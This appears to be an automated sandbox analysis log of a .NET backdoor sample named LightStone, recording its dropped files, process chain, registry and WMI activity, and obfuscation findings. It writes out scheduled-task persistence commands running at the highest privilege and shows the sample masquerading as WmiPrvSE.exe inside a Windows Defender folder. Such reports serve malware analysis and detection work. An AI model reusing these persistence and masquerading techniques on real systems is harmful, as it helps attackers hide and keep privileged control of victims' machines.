Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, 00000000.00000003.1627365578.0000000004954000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename telescop.dll$ vs HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, 00000000.00000003.1628668977.0000000004A6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename telescop.dll$ vs HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Binary or memory string: OriginalFilename telescop.dll$ vs HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | File created: C:\Users\user\AppData\Roaming\Adobe\__tmp_rar_sfx_access_check_5700515
Source: classification engine | Classification label: mal100.troj.evad.winEXE@24/15@1/1
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007D6EC9 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007E9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | File created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Adobe\87tDm8T1lOvAjdSEmWMIMA3JTpcTMB.bat" "
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | ReversingLabs: Detection: 68%
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Virustotal: Detection: 65%
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | File read: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Adobe\87tDm8T1lOvAjdSEmWMIMA3JTpcTMB.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Adobe\hui.exe C:\Users\user\AppData\Roaming\Adobe\hui.exe
Source: unknown | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KQihinlofznONtA" /sc ONLOGON /tr "'C:\PerfLogs\KQihinlofznONtA.exe'" /rl HIGHEST /f
Source: unknown | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\WmiPrvSE.exe'" /rl HIGHEST /f
Source: unknown | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe'" /rl HIGHEST /f
Source: unknown | Process created: C:\PerfLogs\KQihinlofznONtA.exe C:\PerfLogs\KQihinlofznONtA.exe
Source: unknown | Process created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Adobe\hui.exe "C:\Users\user\AppData\Roaming\Adobe\hui.exe"
Source: unknown | Process created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Adobe\87tDm8T1lOvAjdSEmWMIMA3JTpcTMB.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Adobe\hui.exe C:\Users\user\AppData\Roaming\Adobe\hui.exe
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Adobe\hui.exe "C:\Users\user\AppData\Roaming\Adobe\hui.exe"
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | File created: C:\Users\user\AppData\Local\Temp\ZsX5CNjlX7
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\PerfLogs\KQihinlofznONtA.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Mutant created: \Sessions\1\BaseNamedObjects\303d53bec5b3d878433ce6218daf83749752600d
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Command line argument: sfxname 0_2_007ED5D4
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Command line argument: sfxstime 0_2_007ED5D4
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Command line argument: STARTDLG 0_2_007ED5D4
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, H7T6jwjmOx9lNTWdDxl.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, H7T6jwjmOx9lNTWdDxl.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, JSNyubnze1kgf4601GJ.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, JSNyubnze1kgf4601GJ.cs | Cryptographic APIs: 'CreateDecryptor'
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\24dbde2999530ef5fd907494bc374d663924116c
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static file information: File size 1378916 > 1048576
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Gpf4LM6WPs4ZKoQlRJk.cs | .Net Code: DHJSRoipckySQktYunk System.Reflection.Assembly.Load(byte[])
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, roXQDD62yvVnYwfS0CG.cs | .Net Code: vD4v7eb5qpePcrZGfwA System.Reflection.Assembly.Load(byte[])
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, JSNyubnze1kgf4601GJ.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007EE28C push eax; ret 0_2_007EE2AA
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007ECAB5 push eax; retf 007Eh 0_2_007ECACE
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007EED46 push ecx; ret 0_2_007EED59
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Code function: 4_2_00007FFD9BAD00BD pushad ; iretd 4_2_00007FFD9BAD00C1
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Code function: 4_2_00007FFD9BADF788 pushfd ; iretd 4_2_00007FFD9BADF82A
Source: C:\PerfLogs\KQihinlofznONtA.exe | Code function: 8_2_00007FFD9BAC00BD pushad ; iretd 8_2_00007FFD9BAC00C1
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Code function: 9_2_00007FFD9BAB3A70 push esi; retf 9_2_00007FFD9BAB3A97
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Code function: 9_2_00007FFD9BAA00BD pushad ; iretd 9_2_00007FFD9BAA00C1
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Code function: 9_2_00007FFD9BAAF788 pushfd ; iretd 9_2_00007FFD9BAAF82A
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Code function: 14_2_00007FFD9BA900BD pushad ; iretd 14_2_00007FFD9BA900C1
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Code function: 18_2_00007FFD9BAA00BD pushad ; iretd 18_2_00007FFD9BAA00C1
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Code function: 18_2_00007FFD9BAAF7A0 pushfd ; iretd 18_2_00007FFD9BAAF82A
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Code function: 18_2_00007FFD9BAB3A70 push esi; retf 18_2_00007FFD9BAB3A97
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | File created: C:\Users\user\AppData\Roaming\Adobe\__tmp_rar_sfx_access_check_5700515
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, hq0YaNpUVMMjnkwTKQb.cs | High entropy of concatenated method names: 'SgbGNgTVcRkVmQd0xdW', 'S3090dTWOjKE9dJmRry', 'LEO5PTT99akrZifvM3V', 'k2k8SDTlrZKX2KX9CNO', 'bmM2s7TxeGIL9SJoupH', 'pa8y8yT4f7JvmS1eFpI', 'xQ3MFxTcIWIULDuIum1', 'hd52W3TeAsXZYx5f06q'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, rOT5WLpcBxE9UdbAPhP.cs | High entropy of concatenated method names: 'sVDQW0DitW1Y9pbd4Lw', 'kJaq5qDKP7DxemQXRKw', 'KOW1jpD7huRwZGiYlNT', 'y2o9cJD3KORT97JgsBW', 'cnb4UKDtVrtLGnuBtu2', 'fLiCqlDOX0vMuUBbgCB', 'v52D9yDY4flacIPq1id', 'BKsVUPDd6BuGMfKTKCX', 'xOhZFODFsNMqsKWD6jA', 'YHncLgDEHZDZeib25FJ'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, v5HsFopo2BtnkOgb1ds.cs | High entropy of concatenated method names: 'Cu9GuMXVu39iKUYvt7q', 'rRVoCVXW87r2svIqF38', 'OKJ93DX9U5IlMgqvxWJ', 'RuDnUxXlccDOh82BIAu', 'y9pTyIXxrcFDnFWn8jc', 'HpBfskX4Tia56j6ysIi', 'gtlUfrXodOoihdHTHvu', 'yGRkSdXQ4tsQjwsmnoT', 'DLEOJDXjAK6jrf7hE8Q', 'A1TwQFXcSKon22q6TfC'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, r9ftfy60Ybjb82jo6bm.cs | High entropy of concatenated method names: 'yrwD75blJdLoM2fuY3c', 'VEya3cbx957qIG09IsR', 'MgUiF5b4aAdlwwOiQRu', 'vfU8o5boYuVH3mjf6e7', 'JSkJIdbQc8mnFhRVdVP', 'XorZKibjHkJg10Fq2gR', 'qCZQMqbW5X9MKETVQLG', 'BZmyYlb9OdU4V3PhNbH'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, vrvM7qYayImISJgKnN.cs | High entropy of concatenated method names: 'XHh51Zjgv', 'IZXI0wPkM', 'QUBwS0IOo', 'cgFoNbIgs', 'zUgNDYZVj', 'SNNGhnn2A', 'EOBEkdi9f', 'Fc1N4mqDDm8p1lMrOVD', 'RLGiknqTngVwqNmA64b', 'Dtrj6YqX0Mk79ZrgiA2'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, OoHhLSXLXYHU0YAyXcN.cs | High entropy of concatenated method names: '_4x2q4', '_268H5', 'u1RBrNmOjY', '_667yS', 'GGeBefnDDK', 'RpYhyJoyQwFoLLh8Q3i', 'hX6g0ioqyBbomdqPp7P', 'tAbylaofid06g26Mdc3', 'p42kTEoMBvpEBKUlANi', 'xUGiu5owE6C4V8geX16'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, rkQYaDnYOqVLBFLImBT.cs | High entropy of concatenated method names: 'PCFC2gpkMF', 'CCOM3wLHFOLmjFLMQWI', 'ATjtIeL8yvM0OWYHHvU', 'xNFawtLC4JyWMPOSg00', 'zStqqTLRDrwupSKLJjq', '_6D3w9', 'aZACm1v6kb', '_4K2q4', '_13y96', '_57u4M'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, RIkehgpLf3MiFkKqZWl.cs | High entropy of concatenated method names: 'bsdVo7XThyb2bRSBFRU', 'zEGPMkXX3YRRYjif9Ek', 'gHayXiXBDFhlEgKZUPV', 'JiAPlAXuw8pdfbgdIaE', 'HCn8gYXGTmKO5HhGyak', 'ny4nSUXbDV0XCZCwvi3', 'hcg3imXrmcD8pqTmjsu', 'OxsUC6XhZ9vj7NCr7Rn', 'fvDI3iX2htAW43jGB7c', 'Ix7xL7XvkM3k1980yKM'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, TnsR5ZJXw5HyMOhXPR5.cs | High entropy of concatenated method names: 'CRMT8FnsQT', 'sLuxSAF3xl5GtS94ls8', 'gds6SmFKBtsbwpmgyxc', 'pvuolNF7xohT0YUHGfw', 'uIldMKFt5fb3JrrsxVI', 'gWet8OFOlcSwTDlrKDq', 'EJ7TVbmMDE', 'Jy8TLJsT0c', 'JDrTtQO1Xc', 'BL0TFZvJmT'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, FI6khW5g2BqeucpMup.cs | High entropy of concatenated method names: 'mMV0qpMHakMsI658Ytg', 'IfjNGmM8nWrHDLswoil', 'M0cvkCMpFa50Ybk3FcB', 'x25qXdMNmL3hrc8KUtN', 'l9v77RMgUlWT6oLjYq6', 'cnxm9JM6HVI6xqV23Z7', 'xM7lVSMCftC98r9XfZY', 'FHIea5MR5V5rQmpe4Bs'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, x8G8c8pF9hB3UFPeq1r.cs | High entropy of concatenated method names: 'o7sBpxTtywPf58FxESd', 'sAfVI9TOl3xrCuT5uly', 'jqmO1OTY9PBAm9qd4E5', 'JgcqIgTdu819HkVpyYB', 'rf2QbCTFHgDehouXA0C', 'J8XqLGTENul37xdORGs', 'JkQM9wT7cK0rYGHpmxu', 'coYpZWT3FCvPmD1nQM2'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, fmGu9ae1cnRhieG3Z7m.cs | High entropy of concatenated method names: 'H5cFMgyhhK', 'E2xFKGd4ls', 'SBvFqAWopJ', 'owSFafrJtD', 'nLfF2RPUko', 'FCf28lCerB8cRrhI1JQ', 'YZjEXVCEjw2stPNDBSI', 'DS0Z5FCcUythBc4ei3b', 'fr5T2VCVc4kg7uh7aMF', 'UGUeKuCWsdjcXDTwDn9'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, SDMxS4pyijWZCt657b2.cs | High entropy of concatenated method names: 'E3OUFATBq8Detsyacnu', 'TQkye5TuCTq0uyyDeQu', 'Fv0igDTGxHD9Sf32cJS', 'EHY1yaTbFKnr4ESDwWe', 'VwkB8mTrqjwJixvsAft', 'EboVhiThog9SaEe3XTQ', 'eL69THT2j5567mBHQbG', 'oA2ps1TAEsxGfTUJULy', 'tuvrZkTiOpDv9ZEjno0', 'CyEyOtTKFtjFla7snww'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, gyY9w9p8VX9bNu22HI9.cs | High entropy of concatenated method names: 'dpn5Y9Bc3FfXfu49M7j', 'M6owMFBe88fJjDejMXs', 'O3HY2XBVXV7sy1UMwqM', 'hOPYHHBWb9YQpum6MNk', 'nZX2EDB9JM9OD8nenjb', 'mwCvmdBlJBropYtTywJ', 'gOBMKeBxvFOlwpaFXOP', 'aYvHZ9B4vHJ6Sv4xoNx', 'OUevNCBokmq0kDDnorL', 'JXYYAiBQhAbcX5lF9eM'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, gchqS6nT2NBsTpC5mte.cs | High entropy of concatenated method names: 'TeBqx', 'd8385', '_3244h', '_8H415', 'yQFSo', '_2hWBH', '_1WKVN', '_53i2R', 'CQ144', '_94h2e'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, W9w4gNea5CBDNL5CCJ1.cs | High entropy of concatenated method names: '_7Xbf5', 'XF52A', 'w5c93', 'dk1Te', 'txKF3lpKNn', '_31z82', 'xTPFUp7Ju8', 'rGTFV2vLOZ', 'P8314', 'ReC64'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, bDsfZ7S90wvIudsBGm.cs | High entropy of concatenated method names: 'npMBdAMZWS9taAbPK44', 'hPvTQvMa2RMdpoDo8fd', 'WfaCOVMn0VvX3069pqq', 'c5le8TMJ9vKghExiqB3', 'uGdN0qMseX3FwvT3O8c', 'l4QnH2Mk43NNsPwABrR', 'mpWXDhMLdEg5XZgPZui', 'yNhYmvMSYisAA1ym8HR', 'guKa3QMmXFC58tGX6BU', 'MUlMQyM0iiMP8Noajdv'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Uxvqoee8x43E1ZlPMQX.cs | High entropy of concatenated method names: 'EojkS1gloAKeHHPEt7f', 'L3H1IogxN4AHjf8q4IA', 'babOvGgWj4uM0FLcSM2', 'fO9iaNg9SpxgUqfCjX9', 'GBbYkH8hMS', 'T3ten6gQvD6FSgVLIbW', 'sHuNuugjpuYZVfGVZUL', 'b8DFNhg4c4TPhysNegM', 'a00ujCgomfJeT9k81FT', 'FGcC1ogCeDJYcWAY0oE'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Lg7gtOrrvnsVl5RcAU.cs | High entropy of concatenated method names: 'aytAIH1fKnqhKAwrHgT', 'MsvsFr1MC3OEgIA9YXn', 'MVwdWS1w0fBWdA69MqZ', 'iiKrKt1UkjvDS4eYls0', 'qmLG3g11wpBJNVkBAsA', 'ag4SjJ1vtjMJqxqP6v4', 'IOr15d1DqHbLYiyqsV2', 'rZM2ZO1Tka6uq7Aay6r', 'iBKmCn1XNgWBwPLc6iN', 'vvanNU1BnB8d71Wodrc'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, BlTCdfXD5ot1lFrO5fS.cs | High entropy of concatenated method names: 'e6dhIOoI4730gi5YEd6', 'OCDNOToZLZ6HhtbBVty', 'RbmN99o6wdhkjlQvgOE', 'dSuA0doPJ8yn1130FDL', '_7V96S', '_5l9Bc', 'itZUNi2R6U', 'QGcUGFdy8F', 'QWc6N', 'GT3UEiBqgR'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, l2ZhI2JbMZw1hOmChxl.cs | High entropy of concatenated method names: '_159q5', 'qvd4H', 'Cq1SQ', '_86I14', 'sUB62', 't8alidVv5AXqK0Bo6JN', 'b1bQG9VDs7jDeRn3xOH', 'aSsSNxVTFiBNAHjCUB2', 'Kg4GTKVXjYpoi0nObZL', 'yN52YhVB0wxEdtRjxvD'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, pCEntIncWR2ad0XxBTc.cs | High entropy of concatenated method names: '_273rl', '_363k6', '_27U99', 'IjVsrHBFwX', 'nMNsu2eibg', 'Sk1sglsnsS', 'fUYs4S1KNH', 'S8IsB91vOi', 'qH2scIam30', 'h843tFkIClVuvrYosnP'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, SH4oW769N66mQFcNQo3.cs | High entropy of concatenated method names: 'PhDmywrIyI', 'vc5mJgQJGu', 'noDWDTAJgVbE8ygYpPL', 'EERJ5tAs2n08aXpRFch', 'KqCLhrAavaMtusSUV77', 'i03U9dAnXaAr1ddg6KP', 'dI7QWoAkrM2uowQwWec', 'Vd8AgkALd0XQwi9MhTg', 'tDcmrDmleN', 'tgZmu0hnMn'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, loKyPlngYxJix9VDC0k.cs | High entropy of concatenated method names: 'BN9EbNej0x', 'cQdEC1E3hO', 'IdrEZSNrgf', 'SoDE6pNFZ5', 'cQOEp0vwEM', 'yHQCudsU89dyxE0FVw7', 'chaoahs1wl824UQJMP3', 'eAiDg2sva6OWkLNJfXL', 'dtkUvrsDnwNAB1m6dhP', 'm3gdkbsTh6mMZLi3odF'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, tNAtGTj1Iej1N1A45oj.cs | High entropy of concatenated method names: 'CELN1lk8wI', 'cpONyajmJI', 'P1fNJ3stdC', 'J5LNjQ6k9o', 'BOiNRnqZYg', 'arlAiGZChjEmRB2uS6G', 'VL9PKtZQhhwncEeb9FI', 'xqn9CoZjmpQVuiZeokF', 'CBC7yVZRonh1BbToP2B', 'FFkMANZHFpTR0lnvfaG'
